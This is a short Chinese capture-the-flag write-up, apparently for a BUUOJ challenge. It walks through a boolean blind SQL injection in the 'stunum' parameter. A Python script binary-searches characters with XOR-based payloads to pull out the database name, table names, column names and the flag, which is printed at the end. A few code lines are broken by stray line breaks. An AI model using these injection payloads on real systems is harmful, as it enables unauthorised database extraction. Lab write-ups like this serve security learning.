開啟網頁

改變引數stunum發現頁面會發生變化。

輸入1成績100

輸入2成績666

最多可以輸入4

通過嘗試可知引數處有布林盲注，0^1會出現1的內容，因此判斷具有盲注

構造指令碼

import requests
url = "http://e7e05311-6b4e-4bce-8545-ff53476b26a9.node4.buuoj.cn:81"

database =""

payload1 = "?stunum=1^(ascii(substr((select(database())),{},1))>{})^1" #庫名為ctf
payload2 = "?stunum=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})^1"#
 
表名為flag,score
payload3 ="?stunum=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{})^1" #列名為flag,value
payload4 = "?stunum=1^(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))>{})^1" #
for i in range(1,10000):
    low 
 
= 32
    high = 128
    mid =(low + high) // 2
    while(low < high):
        #payload = payload1.format(i,mid)  #查庫名
        #payload = payload2.format(i,mid)  #查表名
        #payload = payload3.format(i,mid)  #查列名
        payload = payload4.format(i,mid) #查flag

        new_url = url + payload
        r 
 
= requests.get(new_url)
        print(new_url)
        if "Hi admin, your score is: 100" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) //2
    if (mid == 32 or mid == 132):
        break
    database +=chr(mid)
    print(database)

print(database)

flag{a35e0b79-a19d-491b-b1de-7222e913766c}